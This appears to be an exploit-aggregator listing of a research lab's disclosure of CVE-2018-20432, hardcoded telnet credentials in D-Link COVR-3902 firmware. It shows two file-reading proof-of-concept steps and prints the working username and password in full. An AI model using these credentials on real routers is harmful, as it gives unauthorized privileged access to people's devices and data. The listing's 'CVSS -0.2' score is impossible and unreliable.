Exploit for COVR 3902 1.01B0 Hardcoded Credentials CVE-2018-20432

Name: Exploit for COVR 3902 1.01B0 Hardcoded Credentials CVE-2018-20432
Rating: 5 (206 reviews)

2020-09-02 | CVSS -0.2

## https://sploitus.com/exploit?id=PACKETSTORM:159058
*Title*: Telnet Hardcoded Credentials  
  
*Summary*: The latest versions of the firmware have hardcoded default  
credentials that can be exploited by an unauthenticated attacker to gain  
privileged access to the firmware and to extract sensitive data  
  
*Affected Firmware:* COVR-3902_REVA_ROUTER_FIRMWARE_v1.01B0  
  
*CVE:* CVE-2018-20432  
  
*Proof of Concept: *  
Step 1: “cat ./etc/init0.d/S80telnetd.sh” to get a username  
Step 2: “cat ./etc/config/image_sign” to get a password.  
  
Username: Alphanetworks  
Password: wrgac61_dlink.2015_dir883  
  
----------  
Cheers !!!  
Team CSW Research Lab <http://www.cybersecurityworks.com>